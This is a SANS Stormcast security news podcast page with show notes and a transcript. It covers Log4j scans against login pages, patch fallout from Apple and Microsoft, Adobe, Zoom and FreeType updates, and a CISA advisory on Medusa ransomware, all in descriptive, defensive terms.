Podcast Detail

SANS Stormcast Thursday Mar 13th: Exploiting Login Pages with Log4j; Patch Tuesday Fallout; Adobe Patches; Medusa Ransomware; Zoom and Font Library Updates;

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9362.mp3

Podcast Logo
Exploiting Login Pages with Log4j; Patch Tuesday Fallout; Adobe Patches; Medusa Ransomware; Zoom and Font Library Updates;
00:00

Log4J Scans for VMWare Hyhbrid Cloud Extensions
An attacker is scanning various login pages, including the authentication feature in the VMWare HCX REST API for Log4j vulnerabilities. The attack submits the exploit string as username, hoping to trigger the vulnerability as Log4j logs the username
https://isc.sans.edu/diary/Scans%20for%20VMWare%20Hybrid%20Cloud%20Extension%20%28HCX%29%20API%20(Log4j%20-%20not%20brute%20forcing)/31762

Patch Tuesday Fallout
Yesterday's Apple patch may re-activate Apple Intelligence for users who earlier disabled it. Microsoft is offering support for users whos USB printers started printing giberish after a January patch was applies.
https://www.macrumors.com/2025/03/11/ios-18-3-2-apple-intelligence-auto-on/
https://learn.microsoft.com/en-us/windows/release-health/status-windows-10-22h2#usb-printers-might-print-random-text-with-the-january-2025-preview-update

Adobe Updates
Adobe updated seven different products, including Adobe Acrobat. The Acrobat vulnerability may lead to remote code execution and Adobe considers the vulnerablities critical.
https://helpx.adobe.com/security/security-bulletin.html


Medusa Ransomware
CISA and partner agencies released details about the Medusa Ransomware. The document includes many details useful to defenders.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a

Zoom Update
Zoom released a critical update fixing a number of remote code execution vulnerabilities.
https://www.zoom.com/en/trust/security-bulletin/

FreeType Library Vulnerability
https://www.facebook.com/security/advisories/cve-2025-27363

Podcast Transcript

 Hello and welcome to the Thursday, March 13th, 2025
 edition of the SANS Internet Storm Center's Stormcast. My
 name is Johannes Ullrich and today I'm recording from
 Jacksonville, Florida. One more mobility that's just not
 going away is Log4j. The latest example are some scans
 that I observed today against the VMware Hyper Cloud
 Extension or HCX API. This is a REST API and at first I
 thought it was just a brute force attempt I saw because
 the endpoint that the request was directed at, well, was
 used for login. It's the session and you just post a
 username and password to it and you'll get back a session
 key that's then being used as a bearer token. However,
 looking at the payload closer, well, the username was
 actually a log4j payload. This makes perfect sense, sort of
 in hindsight, that an attacker would use a username to inject
 a log4j payload because, well, that's the part that's usually
 logged from a request like this. And interestingly, the
 IP that was going after these VMware systems also went after
 a couple other login pages like some Cisco login pages
 and others that I yet have to identify. They're sort of just
 generic, like some just login. So it could be various
 applications that are being attacked here. And then we got
 a little bit of Patch Tuesday cleanup. First of all, the
 Apple update released yesterday that fixed the
 server day vulnerability in macOS and iOS. Apparently,
 after applying this update, some users reported that Apple
 intelligence is being reenabled. If they had it
 disabled first, that's Apple's artificial intelligence
 feature that typically is enabled by default, but you
 are able to disable it. Well, in Europe, I don't think it's
 available. So no issue with Europe here. This has been an
 issue in the last update as well. So nothing really
 terribly new here. Just be aware. And if you want it
 disabled, double check that it's still disabled. Nothing
 yet. I heard about yesterday's Microsoft update, but there
 are some reports that actually January update does cause some
 issues with USB printers. And it does cause them to print
 gibberish. If you're affected by this, I'll have a link to a
 statement from Microsoft here in the show notes. And
 yesterday when I was recording, Adobe had not
 released its Patch Tuesday update yet. Well, they have
 been released now. They updated a total of seven
 different applications. The one that's noteworthy here is
 Acrobat Reader. Of course, that's an old favorite when it
 comes to patching. And it fixes a number of critical
 remote code execution vulnerabilities. So definitely
 something that you need to apply if you're running Adobe
 Acrobat Reader. And CISA, in conjunction with some partner
 agencies, did publish a report about the Medusa malware. This
 is a ransomware. I'm always looking first for sort of
 initial access. In this case, it appears to be phishing. Of
 course, still very common. Screen connect. We talked
 about this before. And then the Fortinet EMS SQL injection
 vulnerability. Another sort of interesting TTP here I find is
 that they see it do some port scans internally. That's
 something that should sort of pop up in any kind of internal
 sensor. In particular, some of the odd ports they're
 scanning, like 3050, the Firebird database port, which
 isn't used much. So having all of a sudden lots of SYN scans
 on this port should be something that could trigger
 an alert. Other than that, a great read as usual. These
 reports are very useful to, first of all, make sure that
 you have blocked some of these initial access vectors as much
 as possible. That you have set up detection for the lateral
 movement, like these port scans. And then, of course,
 also just to check if you're not already infected. There
 are a number of IOCs and such listed in the report. And then
 let's look at some other patches. We got, first of all,
 Zoom released an update, fixing five vulnerabilities.
 Four of them are rated as high, meaning they lead to
 remote code execution, buffer overflows, buffer underflow,
 use after three. Sort of your standard vulnerabilities here.
 Updated. I find Zoom is pretty good in sort of keeping itself
 updated. So it shouldn't be a big issue. And then we got an
 update for the free type library. This is one of those
 font rendering libraries. Plenty of past vulnerabilities
 in libraries like this. This could lead to remote code
 execution. Problem with all these libraries is that,
 number one, they're everywhere. So you'll have to
 wait for things like browsers and other display software to
 be updated. Secondly, there are a lot of fonts being
 loaded sort of dynamically these days. And that's how a
 vulnerability like this could possibly be exploited. Well,
 and this is it again for today. Thanks for subscribing.
 Thanks for leaving good reviews. Thanks for telling
 everybody, friends and enemies, how great this
 podcast is. And get them to subscribe to it as well.
 Thanks and talk to you again tomorrow. Bye